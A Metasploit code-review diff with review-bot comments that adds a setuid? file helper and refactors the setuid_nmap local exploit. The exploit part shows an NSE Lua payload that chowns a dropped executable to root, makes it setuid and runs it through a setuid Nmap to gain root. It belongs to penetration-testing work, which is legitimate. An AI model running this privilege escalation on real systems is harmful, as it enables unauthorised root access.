diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb
index 3a76ff1f58..f931379de4 100644
--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -59,7 +59,7 @@ module Msf::Post::File
 #
 # @param path [String] Remote filename to check
 def directory?(path)
- if session.type == "meterpreter"
+ if session.type == 'meterpreter'
 stat = session.fs.file.stat(path) rescue nil
 return false unless stat
 return stat.directory?
@@ -70,9 +70,9 @@ module Msf::Post::File
 f = session.shell_command_token("test -d \"#{path}\" && echo true")
 end
- return false if f.nil? or f.empty?
+ return false if f.nil? || f.empty?
 return false unless f =~ /true/
- return true
+ true
 end
 end
@@ -93,7 +93,7 @@ module Msf::Post::File
 #
 # @param path [String] Remote filename to check
 def file?(path)
- if session.type == "meterpreter"
+ if session.type == 'meterpreter'
 stat = session.fs.file.stat(path) rescue nil
 return false unless stat
 return stat.file?
@@ -107,20 +107,40 @@ module Msf::Post::File
 f = session.shell_command_token("test -f \"#{path}\" && echo true")
 end
- return false if f.nil? or f.empty?
+ return false if f.nil? || f.empty?
 return false unless f =~ /true/
- return true
+ true
 end
 end
 alias file_exist? file?
+ #
+ # See if +path+ on the remote system is a setuid file
+ #
+ # @param path [String] Remote filename to check
+ def setuid?(path)
+ if session.type == 'meterpreter'
+ stat = session.fs.file.stat(path) rescue nil
+ return false unless stat
+ return stat.setuid?
+ else
+ if session.platform != 'windows'
+ f = session.shell_command_token("test -u \"#{path}\" && echo true")
+ end
+
+ return false if f.nil? || f.empty?
+ return false unless f =~ /true/
+ true
+ end
+ end
+
 #
 # Check for existence of +path+ on the remote file system
 #
 # @param path [String] Remote filename to check
 def exist?(path)
- if session.type == "meterpreter"
+ if session.type == 'meterpreter'
 stat = session.fs.file.stat(path) rescue nil
 return !!(stat)
 else
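Review bot: setuid? answers true for any path whose setuid bit is set, not only regular files — `stat.setuid?` in the Meterpreter branch and `test -u` in the shell branch both accept directories — while the new header comment says "is a setuid file", so a caller that reads the name as implying a file still has to combine it with file?. I would make the contract explicit in the header: `# @return [Boolean] true when the setuid bit is set on +path+ (any file type); false on a non-Meterpreter Windows session, where no command is run and +f+ stays nil`. The shell branch interpolates path into a double-quoted `test -u "…"` exactly as the sibling helpers do, so a path containing a double quote or `$` is not tested literally; the Meterpreter branch is unaffected. `rescue nil` on the stat call also folds every failure (missing path, permission denied, transport error) into false, which matches the existing helpers but belongs in the @return note since callers cannot distinguish "not setuid" from "could not stat".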
@@ -130,9 +150,9 @@ module Msf::Post::File
 f = cmd_exec("test -e \"#{path}\" && echo true")
 end
- return false if f.nil? or f.empty?
+ return false if f.nil? || f.empty?
 return false unless f =~ /true/
- return true
+ true
 end
 end
@@ -290,7 +310,7 @@ module Msf::Post::File
 end
 end
- return true
+ true
 end
 #
@@ -314,7 +334,7 @@ module Msf::Post::File
 _write_file_unix_shell(file_name, data, true)
 end
 end
- return true
+ true
 end
 #
diff --git a/modules/exploits/unix/local/setuid_nmap.rb b/modules/exploits/unix/local/setuid_nmap.rb
index f10df3a014..020e196bec 100644
--- a/modules/exploits/unix/local/setuid_nmap.rb
+++ b/modules/exploits/unix/local/setuid_nmap.rb
@@ -51,12 +51,11 @@ class MetasploitModule < Msf::Exploit::Local
 end
 def check
- stat = session.fs.file.stat(datastore["Nmap"])
- if stat and stat.file? and stat.setuid?
- vprint_good("#{stat.prettymode} #{datastore["Nmap"]}")
+ if setuid?(datastore['Nmap'])
+ vprint_good("#{datastore['Nmap']} is setuid")
 return CheckCode::Vulnerable
 end
- return CheckCode::Safe
+ CheckCode::Safe
 end
 def exploit
@@ -69,16 +68,16 @@ class MetasploitModule < Msf::Exploit::Local
 write_file(exe_file, generate_payload_exe)
 evil_lua = %Q{
 os.execute("chown root:root #{exe_file}");
- os.execute("chmod 6777 #{exe_file}");
+ os.execute("chmod 6700 #{exe_file}");
 os.execute("#{exe_file} &");
- os.execute("rm #{exe_file}");
+ os.execute("rm -f #{exe_file}");
 }
 end
 lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse"
 print_status("Dropping lua #{lua_file}")
 write_file(lua_file, evil_lua)
- print_status("running")
+ print_status("Running #{lua_file} with Nmap")
 scriptname = lua_file
 if (lua_file[0,1] == "/")
@@ -91,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
 # Versions before 4.75 (August 2008) will not run scripts without a port scan
 cmd_exec "#{datastore["Nmap"]} --script #{scriptname} -p80 localhost #{datastore["ExtraArgs"]}"
 ensure
- cmd_exec "rm -f #{lua_file} #{exe_file}"
+ rm_f(lua_file, exe_file)
 end
 end
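Review bot: check in setuid_nmap.rb no longer requires the target to be a regular file: the removed condition was `stat and stat.file? and stat.setuid?`, but the replacement `if setuid?(datastore['Nmap'])` tests only the setuid bit, so a setuid directory or other non-file at that path is now reported as Vulnerable. Keeping the old verdict is a one-line change, `if file?(datastore['Nmap']) && setuid?(datastore['Nmap'])`, since file? comes from the same Msf::Post::File mixin that provides setuid? (the mixin is presumably included, as the call to setuid? implies). The new message also drops `stat.prettymode`, so the verbose output no longer shows the mode that justified the verdict; if that was useful, say so in the message or in a comment above the check. Reading `datastore['Nmap']` twice in the condition would read better hoisted into a local, `nmap = datastore['Nmap']`.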